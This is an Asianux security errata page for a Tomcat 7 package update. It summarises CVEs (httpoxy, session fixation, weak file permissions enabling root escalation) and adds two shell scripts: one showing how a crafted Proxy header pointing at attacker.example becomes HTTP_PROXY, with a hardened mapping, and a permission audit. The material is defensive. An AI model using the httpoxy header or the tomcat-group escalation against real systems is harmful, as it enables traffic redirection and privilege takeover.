tomcat-7.0.54-8.el7
Errata ID: AXSA:2016-704:01
Tomcat is the servlet container that is used in the official Reference
Implementation for the Java Servlet and JavaServer Pages technologies.
The Java Servlet and JavaServer Pages specifications are developed by
Sun under the Java Community Process.
Tomcat is developed in an open and participatory environment and
released under the Apache Software License version 2.0. Tomcat is intended
to be a collaboration of the best-of-breed developers from around the world.
Security issues fixed with this release:
CVE-2014-7810
The Expression Language (EL) implementation in Apache Tomcat 6.x
before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not
properly consider the possibility of an accessible interface
implemented by an inaccessible class, which allows attackers to bypass
a SecurityManager protection mechanism via a web application that
leverages use of incorrect privileges during EL evaluation.
CVE-2015-5346
Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x
before 8.0.30, and 9.x before 9.0.0.M2, when different session
settings are used for deployments of multiple versions of the same web
application, might allow remote attackers to hijack web sessions by
leveraging use of a requestedSessionSSL field for an unintended
request, related to CoyoteAdapter.java and Request.java.
CVE-2016-5388
Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI
Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does
not protect applications from the presence of untrusted client data in
the HTTP_PROXY environment variable, which might allow remote attackers
to redirect an application's outbound HTTP traffic to an arbitrary
proxy server via a crafted Proxy header in an HTTP request, aka an
"httpoxy" issue. The mapping itself is the problem: RFC 3875 turns a
request header named Proxy into the meta-variable HTTP_PROXY, and many
HTTP client libraries read that variable as their outbound proxy
setting. NOTE: the vendor states "A mitigation is planned for future
releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is
not a CVE ID for a vulnerability.
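The header-to-variable mapping is what turns an ordinary request into HTTP_PROXY in the CGI child's environment. The following POSIX shell script is an added example, not Tomcat code: it reproduces the RFC 3875 section 4.1.18 mapping, shows a constructed Proxy header landing in HTTP_PROXY, and beside it a hardened mapping that drops the header whatever case the client used. All header names, values and the attacker URL are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not Tomcat code): the RFC 3875 section 4.1.18 mapping from
# request headers to CGI meta-variables, which is how a client-chosen
# "Proxy" header becomes HTTP_PROXY in the CGI child's environment, next to
# a hardened mapping that refuses to export that variable. POSIX sh; the
# header values below are constructed for the demonstration.

# cgi_meta_name NAME: uppercase, '-' -> '_', prefix HTTP_ (RFC 3875 4.1.18).
cgi_meta_name() {
    printf 'HTTP_%s' "$(printf '%s' "$1" | tr 'a-z-' 'A-Z_')"
}

# cgi_env_naive NAME VALUE: export every header, exactly as the RFC says.
# "Proxy: http://attacker.example:8080" becomes
# HTTP_PROXY=http://attacker.example:8080, which libcurl and other clients
# honour as the proxy for outbound requests made by the CGI program.
cgi_env_naive() {
    printf '%s=%s\n' "$(cgi_meta_name "$1")" "$2"
}

# cgi_env_hardened NAME VALUE: same mapping, but a header that would become
# HTTP_PROXY is dropped whatever case the client used ("Proxy", "pRoXy"...).
# Prints nothing and returns 1 for such a header so callers can log it.
cgi_env_hardened() {
    name=$(cgi_meta_name "$1")
    if [ "$name" = HTTP_PROXY ]; then
        return 1
    fi
    printf '%s=%s\n' "$name" "$2"
}

# Constructed request headers, including the attacker-supplied one.
demo() {
    echo "naive mapping:"
    cgi_env_naive Host www.example.com
    cgi_env_naive User-Agent curl/7.29.0
    cgi_env_naive Proxy http://attacker.example:8080
    echo "hardened mapping:"
    cgi_env_hardened Host www.example.com
    cgi_env_hardened User-Agent curl/7.29.0
    cgi_env_hardened pRoXy http://attacker.example:8080 || echo "(Proxy header dropped)"
}

demo
```

Dropping the one header is the minimal fix. An allowlist of the headers the CGI programs actually need is the more robust form of the same check, because it also covers any other environment variable a client library might start honouring later.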
CVE-2016-5425
The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS,
Oracle Linux, and possibly other Linux distributions uses weak
permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local
users to gain root privileges by leveraging membership in the tomcat
group. systemd-tmpfiles processes that file as root, so a tomcat group
member who can write it controls what root creates, owns or removes the
next time it runs.
CVE-2016-6325
The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss
Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1)
/etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows
local users to gain privileges by leveraging membership in the tomcat
group.
Update packages.
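As an added check that is not part of this advisory or of the Tomcat package, the following POSIX shell script audits the three files named in CVE-2016-5425 and CVE-2016-6325 for the condition those entries describe: a root-owned file that the tomcat group (or everyone) can write. The paths and the rule come from the descriptions above; GNU stat(1) is assumed, and the script name tomcat-perms.sh is hypothetical.

```shell
#!/bin/sh
# Added example, not part of the advisory or of the Tomcat package: audit the
# files named in CVE-2016-5425 and CVE-2016-6325 for the weak permissions
# those entries describe (root-owned files writable by the tomcat group).
# POSIX sh with GNU stat(1). Script name tomcat-perms.sh is hypothetical.

# check_perms PATH [EXPECTED_OWNER] [SENSITIVE_GROUP]
# Prints "OK PATH (...)", "WEAK PATH: reason" or "MISSING PATH".
# Returns 1 only when the file is WEAK, so the result can drive an exit code.
check_perms() {
    path=$1
    want_owner=${2:-root}
    sensitive_group=${3:-tomcat}
    if [ ! -e "$path" ]; then
        echo "MISSING $path"
        return 0
    fi
    perm=$(stat -c '%A' "$path")   # e.g. -rw-rw-r--
    owner=$(stat -c '%U' "$path")
    group=$(stat -c '%G' "$path")
    group_w=$(printf '%s' "$perm" | cut -c6)   # group write bit
    other_w=$(printf '%s' "$perm" | cut -c9)   # other write bit
    reason=
    if [ "$owner" != "$want_owner" ]; then
        reason="owned by $owner, expected $want_owner"
    elif [ "$other_w" = w ]; then
        reason="world-writable ($perm)"
    elif [ "$group_w" = w ] && [ "$group" = "$sensitive_group" ]; then
        reason="writable by group $group ($perm), which is the CVE condition"
    fi
    if [ -n "$reason" ]; then
        echo "WEAK $path: $reason"
        return 1
    fi
    echo "OK $path ($perm $owner:$group)"
    return 0
}

# audit_tomcat_files [PATH...]: check the advisory's three paths (or the ones
# given) and return 1 if any is WEAK.
audit_tomcat_files() {
    if [ $# -eq 0 ]; then
        set -- /usr/lib/tmpfiles.d/tomcat.conf \
               /etc/sysconfig/tomcat \
               /etc/tomcat/tomcat.conf
    fi
    rc=0
    for f in "$@"; do
        check_perms "$f" || rc=1
    done
    return $rc
}

# Stand-alone: `sh tomcat-perms.sh` (or with explicit paths); the exit status
# is the audit result, so it can gate a deployment check.
audit_tomcat_files "$@"
```

A file that is reported MISSING is not a finding on its own; after the update, rerun the audit to confirm each file is present, owned by root and not writable by the tomcat group.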
N/A
SRPMS
- tomcat-7.0.54-8.el7.src.rpm
MD5: b021480fa3a2944d64d840be46c6f082
SHA-256: 073488f1ad7c4870b9d56cd3a1e55a7abea53874205b977ec2d4e812f460d8be
Size: 4.46 MB
Asianux Server 7 for x86_64
- tomcat-7.0.54-8.el7.noarch.rpm
MD5: 0df7f4ed30c4345117bb7e096902868f
SHA-256: 4b45b50049d22645cd669dbceb5a808192f01d0d0ae707e687085c4efdea8741
Size: 84.30 kB
- tomcat-admin-webapps-7.0.54-8.el7.noarch.rpm
MD5: a326a58fe136eca7608d026f44d29a91
SHA-256: c9eff73882575e7d08685a4138fc89755223cb705a99458af6a76770bedd4bbf
Size: 37.64 kB
- tomcat-el-2.2-api-7.0.54-8.el7.noarch.rpm
MD5: 871b9589af47dc5549a21d060769d7cd
SHA-256: 4ae2722a245675015b9e60ac00cca2a7cd3178a84c0c651c1d7af8290c141446
Size: 76.30 kB
- tomcat-jsp-2.2-api-7.0.54-8.el7.noarch.rpm
MD5: 6a3c8b96e9359e8e7791c0663dc9ff8d
SHA-256: 21257f6a2e47e7f3fc49786f7d30924506409aeea27692946f4a956d54070ebf
Size: 89.71 kB
- tomcat-lib-7.0.54-8.el7.noarch.rpm
MD5: 70d60f8f41fbbc199326df8010b70dd2
SHA-256: 74f65f345884d88612a46202bc61b5456368611833a72186fca4e77132d0b1c4
Size: 3.67 MB
- tomcat-servlet-3.0-api-7.0.54-8.el7.noarch.rpm
MD5: 5314dd3d6e6a2d28212c534d4ac7b940
SHA-256: 7aa5e6af967c8080ebe570c6b5a499a5b24cd1f3a40f4a5c8de8f6e1aef00912
Size: 206.92 kB
- tomcat-webapps-7.0.54-8.el7.noarch.rpm
MD5: e7820a4d441dfa8a450bbec5e615e5c9
SHA-256: 0aad3841a83b508dd17e13f39842976ea018a1aa78904f6c748f4527ef80b958
Size: 350.93 kB